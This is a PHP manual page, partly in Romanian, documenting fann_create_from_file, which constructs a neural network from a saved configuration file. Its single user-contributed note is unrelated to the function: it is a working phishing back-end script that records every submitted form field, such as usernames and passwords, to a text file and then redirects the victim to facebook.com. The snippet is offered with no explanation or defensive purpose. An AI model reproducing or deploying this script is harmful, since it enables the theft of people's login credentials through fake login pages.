PHP Velho Oeste 2024

fann_create_from_file

(PECL fann >= 1.0.0)

fann_create_from_fileConstructs a backpropagation neural network from a configuration file

Descrierea

fann_create_from_file ( string $configuration_file ) : resource

Constructs a backpropagation neural network from a configuration file, which have been saved by fann_save().

Parametri

configuration_file

The configuration file path.

Valorile întoarse

Întoarce o resource a rețelei neuronale în caz de succes, sau false în caz de eroare.

A se vedea și

  • fann_save() - Saves the entire network to a configuration file

add a note add a note

User Contributed Notes 1 note

up
-1
alangkazo at gmail dot com
9 years ago
Code:
<?php
header
('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach(
$_POST as $variable => $value) {
  
fwrite($handle, $variable);
  
fwrite($handle, "=");
  
fwrite($handle, $value);
  
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
To Top